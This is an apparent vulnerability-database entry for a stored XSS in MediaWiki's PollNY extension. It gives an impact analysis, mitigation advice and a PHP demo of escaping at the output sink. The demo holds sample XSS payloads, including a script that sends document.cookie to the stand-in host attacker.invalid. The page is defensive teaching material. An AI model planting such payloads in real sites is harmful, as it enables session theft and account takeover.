
CVE-2025-62653: CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') in The Wikimedia Foundation MediaWiki PollNY extension

Severity: Low
Tags: Vulnerability, CVE-2025-62653, CWE-79
Published: Fri Oct 17 2025 (10/17/2025, 22:23:05 UTC)
Source: CVE Database V5
Vendor/Project: The Wikimedia Foundation
Product: MediaWiki PollNY extension

Description

Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in The Wikimedia Foundation MediaWiki PollNY extension allows Stored XSS. This issue affects MediaWiki PollNY extension: 1.39, 1.43, 1.44.

AI-Powered Analysis

Last updated: 10/18/2025, 03:38:17 UTC

Technical Analysis

CVE-2025-62653 is a stored cross-site scripting (XSS) vulnerability, CWE-79, in the PollNY extension for MediaWiki. The affected versions in the record, 1.39, 1.43 and 1.44, are the extension's release branches that track those MediaWiki releases, so a wiki on any of those branches with PollNY installed should be treated as affected. Stored XSS means the attacker's JavaScript is persisted in the application's own data (for a polling extension, in the poll content it renders) and is served to, and executed in the browser of, every user who later views the affected page, with no further action by the attacker. For the victim this can mean session hijacking, credential theft, or actions performed in their name with their wiki permissions. According to the CVSS 4.0 vector the attack is network-reachable but has high attack complexity, requires the attacker to already hold high privileges, requires user interaction, and has low impact on confidentiality, integrity and availability; the privilege and interaction requirements are what keep the rating at Low. At the time of this analysis no public exploit or fix had been recorded for the issue, although it is published and tracked. MediaWiki is widely deployed for collaborative documentation, including by European public institutions, universities and private organisations, and any such instance that runs PollNY is exposed to a privileged insider, or to a compromised privileged account, embedding script in polls or in the pages that display them.
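As an added illustration (not PollNY's code and not from the CVE record), the PHP below shows the CWE-79 pattern behind a stored XSS in a poll field: one render function concatenates the stored question and choice straight into HTML, the other encodes at the output sink. The function names, the poll markup and the payloads are constructed for this example; the MediaWiki helpers named in the comments (Html::element, Html::rawElement) are real.

```php
<?php
// Added illustration of the CWE-79 pattern behind a stored XSS in a poll
// field. This is not PollNY's code; renderPoll*() and the payloads are
// constructed for the demo. In MediaWiki code the hardened form corresponds
// to Html::element(), which escapes its text argument, whereas
// Html::rawElement() and plain string concatenation do not.
declare(strict_types=1);

// Vulnerable sink: the stored poll text is concatenated into HTML unchanged,
// once in an element body and once inside a double-quoted attribute.
function renderPollVulnerable(string $question, string $choice): string {
    return '<div class="poll-question">' . $question . '</div>'
         . '<input type="radio" name="choice" value="' . $choice . '">';
}

// Hardened sink: HTML-encode at the point of output, in every context.
// ENT_QUOTES also encodes ' and ", so the value is safe inside attributes;
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
function esc(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function renderPollSafe(string $question, string $choice): string {
    return '<div class="poll-question">' . esc($question) . '</div>'
         . '<input type="radio" name="choice" value="' . esc($choice) . '">';
}

// Sink-encoding probe: true when the raw untrusted string reaches the page
// verbatim, i.e. any markup it carries is live for the browser. This tests
// whether the sink encodes, not whether a particular payload is exploitable
// in its particular context.
function reachesPageUnencoded(string $rendered, string $untrusted): bool {
    return strpos($rendered, $untrusted) !== false;
}

// Constructed payloads, one per injection context a poll field can land in.
$payloads = [
    'element body'       => '<img src=x onerror="alert(document.cookie)">',
    'attribute breakout' => '"><script>fetch("https://attacker.invalid/?c=" + document.cookie)</script>',
    'single-quote only'  => "' onfocus='alert(1)' autofocus='",
];

foreach ($payloads as $label => $p) {
    $vuln = renderPollVulnerable($p, $p);
    $safe = renderPollSafe($p, $p);
    printf("%-20s vulnerable: %-5s  hardened: %s\n",
        $label,
        reachesPageUnencoded($vuln, $p) ? 'LIVE' : 'inert',
        reachesPageUnencoded($safe, $p) ? 'LIVE' : 'inert');
}
```

Run it with `php poll-xss-demo.php` (file name is a placeholder). Every row of the vulnerable column reports LIVE because the raw string survives into the page; every hardened row reports inert. When auditing an extension's templates this is the question to ask of each sink: any user-controlled value that reaches the output verbatim is a finding, regardless of whether the specific payload you tried happens to fire in that context.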

Potential Impact

For European organisations the realistic outcome of exploitation is attacker-controlled script running in the browsers of wiki users: hijacked sessions, phishing overlays served from a trusted internal domain, or defaced wiki pages. The CVSS score is Low, but where MediaWiki hosts sensitive or internal material the loss of confidentiality and integrity is not negligible. Public-sector bodies, universities and enterprises that use MediaWiki for documentation or knowledge sharing could suffer data exposure or reputational damage. Because the attacker needs high privileges and a victim must interact, opportunistic mass exploitation is unlikely, but a malicious insider or an attacker who has already taken over a privileged account fits the profile exactly, and a stored payload keeps firing for every viewer until it is removed. No exploitation in the wild is known at present; that limits immediate risk but not future risk once the details are widely understood.

Mitigation Recommendations

Monitor the extension's repository and Wikimedia's security announcements for a fixed revision and update PollNY as soon as one is published; MediaWiki extensions are patched by updating the extension's own branch, not only the MediaWiki core release. Until then, disable PollNY (remove or comment out its wfLoadExtension line in LocalSettings.php) or restrict who may create and edit polls, especially on wikis with many privileged accounts. Input validation and output encoding for the poll fields live in the extension's PHP code and cannot be switched on through MediaWiki configuration, so the real fix is the updated extension. What an administrator can configure is a Content Security Policy (MediaWiki ships $wgCSPHeader and $wgCSPReportOnlyHeader for this) to stop injected inline script from running in browsers that honour the header. Review existing poll content for markup that should not be there, keep access controls tight, and watch logs for unusual poll creation or edits by privileged accounts. Web application firewall rules that match XSS payloads aimed at the PollNY endpoints, regular web application testing that covers XSS, and user awareness of suspicious links all reduce the blast radius, but none of them replaces the fix.
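An added LocalSettings.php fragment (not from the page, from PollNY or from MediaWiki's defaults) showing the CSP rollout the recommendations refer to. It assumes a wiki that sends no Content-Security-Policy header today and uses only the boolean forms of the two settings, which are MediaWiki's own; the staged order of operations is the editor's suggestion, and the array form with explicit directives is described in MediaWiki's configuration reference.

```php
<?php
// LocalSettings.php excerpt. Added illustration: the two settings are
// MediaWiki's, the staged rollout is an assumption about a sensible order.

// Before (MediaWiki's shipped default): no CSP header is sent at all, so a
// stored <img onerror=...> in a poll runs as soon as the page renders.
// $wgCSPHeader = false;

// Stage 1: report-only. Browsers keep executing everything but report
// violations, which surfaces the gadgets, site JS and extensions that rely on
// inline script before anything is blocked. Leave this on long enough to
// cover normal wiki usage, including the PollNY pages.
$wgCSPReportOnlyHeader = true;

// Stage 2: enforce, once the report-only run is clean. `true` sends
// MediaWiki's built-in policy, which is designed to let the wiki's own scripts
// load while refusing script the wiki did not serve, so inline handlers and
// <script> tags injected through a stored XSS are refused by browsers that
// honour the header. It does not remove the stored payload and does not cover
// clients that ignore CSP, so it sits alongside the extension fix, not in
// its place.
$wgCSPHeader = true;
```

After each stage, confirm what the wiki actually emits with `curl -sI 'https://wiki.example.org/index.php?title=Main_Page' | grep -i content-security-policy` (wiki.example.org is a placeholder): the report-only stage must show a Content-Security-Policy-Report-Only header and the enforced stage a Content-Security-Policy header. The browser developer console lists the violations, which is where the report-only stage tells you what still depends on inline script and needs moving into a served resource before you enforce.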


Technical Details

Data Version: 5.1
Assigner Short Name: wikimedia-foundation
Date Reserved: 2025-10-17T22:01:52.600Z
CVSS Version: 4.0
State: PUBLISHED

Threat ID: 68f30b9cba51437ed4a824e1

Added to database: 10/18/2025, 3:38:04 AM

Last enriched: 10/18/2025, 3:38:17 AM

Last updated: 10/19/2025, 7:06:30 AM
